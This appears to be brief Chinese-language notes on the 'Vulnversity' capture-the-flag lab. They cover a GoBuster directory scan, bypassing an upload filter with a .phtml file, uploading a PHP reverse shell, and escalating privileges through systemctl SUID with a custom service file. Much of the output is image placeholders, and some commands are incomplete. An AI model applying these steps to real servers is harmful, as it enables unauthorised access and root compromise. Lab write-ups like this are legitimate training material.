Vulnversity
了解主动侦察、Web 应用程序攻击和权限提升。
端口情况
![[Pasted image 20220515105923.png]]
访问3333端口
![[Pasted image 20220515110027.png]]
GoBuster扫目录
GoBuster 是一种用于暴力破解 URI(目录和文件)、DNS子域和虚拟主机名的工具。对于这台机器,我们将专注于使用它来暴力破解目录。
1 | gobuster dir -u http://10.10.20.174:3333 -w /usr/share/wordlists/dirb/common.txt |
上传目录
/internal
用burpsuite fuzz一下上传类型
.phtml可以上传
php shell
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
![[Pasted image 20220515111913.png]]
![[Pasted image 20220515111927.png]]
获得shell
![[Pasted image 20220515112744.png]]
提权
告诉我们了是Suid提权find / -user root -perm -4000 -exec ls -ldb {} \;
寻找提权项
在提权辅助页
找到了systemctl
开始提权
systemctl–suid提权
先在kali机上创建一个反弹shell的a.service
1 | [Service] |
systemctl提权的时候最好是在==/dev/shm==目录下,因为通常情况下unit是放在
/usr/lib/systemd/system/
/etc/systemd/system/
渗透情况下这两个目录都不可写
1 | python -m http.service 9001 |
![[Pasted image 20220515120403.png]]